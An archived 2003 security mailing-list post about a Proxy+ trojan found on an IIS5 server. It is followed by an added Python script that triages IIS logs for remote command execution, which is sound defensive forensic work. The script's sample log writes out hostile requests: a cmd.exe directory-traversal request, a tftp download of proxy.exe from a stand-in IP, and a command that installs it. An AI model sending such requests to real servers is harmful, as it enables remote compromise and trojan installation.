Security Basics mailing list archives
Re: Proxy+ Trojan
From: "Bill" <proftpd () anatek com>
Date: Mon, 3 Feb 2003 18:57:45 -0600
Hamish, sorry, I should have provided a better description to begin.
The simple answer is find out how it was put on there, and block off that
That's the problem -- it's not so simple. This is a dedicated web server (Win2K/IIS5) that I have co-located in a top-tier data center. The app was installed remotely, and no logins were compromised. I had just finished having my SQL Server hardened (about 10 days _before_ Slammer!) and we ran some extensive password cracking software then. I was feeling pretty ok, and then I started getting SpamCop reports. I checked for an open relay a hundred times, but couldn't find anything. After a couple of days I found the copy of Proxy+ and blew it away. I then installed a software firewall, and I'm ok now (except for learning how to configure the firewall :-) ). The real problem is that I don't know how this install was done. I would really like to address this as an independent issue. I must have something configured horribly wrong, but how do I start the detective work? And now, everything seems suspicious. I feel the urge to disable every service! :-) Anyhow, if you have ideas on how an app could get installed remotely, I could start investigating.
Then do a security audit on that machine.
I have subscribed to the SecurityMetrics offering, which I think will definitely help on an ongoing basis. But my situation is not ideal. I'm misconfigured, I'm sure, but handling it with a firewall. I want to be correctly configured and have the firewall as an extra measure of safety. I would enjoy hearing your speculation! Thanks! Bill
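One place to start the detective work Bill asks about is the IIS web logs themselves: on an IIS 5 box they are written in W3C extended format under %SystemRoot%\System32\LogFiles\W3SVC1\, and a remote install through the web server usually leaves requests that reach cmd.exe, use directory-traversal encodings, pull a payload down with tftp, or write files with PUT. The script below is an added example, not code from this thread or from any poster; the log lines, IP addresses and file names in it are constructed samples in the IIS W3C layout, not logs from Bill's server, and the pattern list is an assumption about what is worth flagging, not a complete signature set.

```python
"""Triage IIS W3C extended log lines for signs of remote command execution.

Added example for this thread, not code from the original post. SAMPLE_LOG is a
constructed sample in the format IIS 5 writes; IPs and file names are made up.
"""
import re

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-01-25 00:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-01-25 03:12:01 192.0.2.10 GET /index.htm - 200
2003-01-25 03:12:44 198.51.100.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir+c:\\ 200
2003-01-25 03:13:02 198.51.100.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+tftp+-i+198.51.100.7+GET+proxy.exe 200
2003-01-25 03:13:30 198.51.100.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+proxy.exe+-install 200
2003-01-25 04:00:12 192.0.2.11 POST /contact.asp - 200
2003-01-25 04:05:50 203.0.113.5 PUT /upload/tool.exe - 201
"""

# Patterns applied to stem + query. Assumed list, not exhaustive: a real hunt
# would add whatever the box actually exposes (WebDAV, sample scripts, etc.).
URI_PATTERNS = [
    ("cmd.exe", re.compile(r"cmd\.exe", re.I)),
    ("traversal", re.compile(r"(\.\./|\.\.\\|%2e%2e|%c0%af|%255c)", re.I)),
    ("tftp_fetch", re.compile(r"\btftp\b", re.I)),
]
# Methods that write to the server; legitimate on few public web servers.
WRITE_METHODS = {"PUT", "MKCOL", "MOVE", "COPY"}


def parse_w3c(text):
    """Yield one dict per request, using the #Fields header to name columns."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip() or fields is None:
            continue
        parts = line.split()
        # IIS writes spaces in the query as '+', so field count should match;
        # skip anything that does not rather than misalign columns.
        if len(parts) != len(fields):
            continue
        yield dict(zip(fields, parts))


def flag_row(row):
    """Return the names of the suspicious patterns this request matches."""
    uri = row.get("cs-uri-stem", "") + " " + row.get("cs-uri-query", "")
    tags = [name for name, rx in URI_PATTERNS if rx.search(uri)]
    if row.get("cs-method", "").upper() in WRITE_METHODS:
        tags.append("write_method")
    return tags


def triage(text):
    """Group flagged requests by client IP: hit count, first sighting, tags, URIs.

    The first_seen timestamp per IP is the thing to carry into the other
    evidence (file creation times, event log, netstat) when reconstructing
    the install.
    """
    report = {}
    for row in parse_w3c(text):
        tags = flag_row(row)
        if not tags:
            continue
        entry = report.setdefault(
            row["c-ip"], {"count": 0, "first_seen": None, "tags": set(), "uris": []}
        )
        entry["count"] += 1
        if entry["first_seen"] is None:
            entry["first_seen"] = row["date"] + " " + row["time"]
        entry["tags"].update(tags)
        entry["uris"].append(row["cs-uri-stem"] + " " + row["cs-uri-query"])
    return report


if __name__ == "__main__":
    for ip, info in triage(SAMPLE_LOG).items():
        print(ip, info["count"], info["first_seen"], sorted(info["tags"]))
        for uri in info["uris"]:
            print("   ", uri)
```

Run it against the real log files rather than the sample (read each file and pass its text to triage), and treat any hit as a lead, not a verdict: the request that fetched the proxy will show up in the logs only if it came in through IIS, so an empty result points the investigation at the other services the box exposes instead.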
Current thread:
- Proxy+ Trojan Bill (Feb 03)
- RE: Proxy+ Trojan dave (Feb 05)
- <Possible follow-ups>
- Re: Proxy+ Trojan KoRe MeLtDoWn (Feb 04)
- Re: Proxy+ Trojan Bill (Feb 05)
- RE: Proxy+ Trojan dave (Feb 04)
- Re: Proxy+ Trojan Bill (Feb 05)
- Re: Proxy+ Trojan KoRe MeLtDoWn (Feb 05)